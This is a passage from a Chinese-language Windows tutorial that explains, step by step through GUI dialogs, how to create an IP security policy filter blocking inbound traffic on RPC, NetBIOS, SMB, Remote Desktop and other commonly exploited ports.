第二步，右击该IP安全策略，在“属性”对话框中，把“使用添加向导”左边的钩去掉，然后单击“添加”按钮添加新的规则，随后弹出“新规则属性”对话框，在画面上点击“添加”按钮，弹出IP筛选器列表窗口;在列表中，首先把“使用添加向导”左边的钩去掉，然后再点击右边的“添加”按钮添加新的筛选器。

进入“筛选器属性”对话框，首先看到的是寻址，源地址选“任何IP 地址”，目标地址选“我的 IP 地址”;点击“协议”选项卡，在“选择协议类型”的下拉列表中选择“TCP”，然后在“到此端口”下的文本框中输入“135”，点击“确定”按钮，这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器，它可以防止外界通过135端口连上你的电脑。

点击“确定”后回到筛选器列表的对话框，可以看到已经添加了一条策略，重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口、TCP 1025、2745、3127、6129、3389 端口的屏蔽策略，建立好上述端口的筛选器，最后点击“确定”按钮。

第三步，在“新规则属性”对话框中，选择“新IP 筛选器列表”，然后点击其左边的圆圈上加一个点，表示已经激活，最后点击“筛选器操作”选项卡。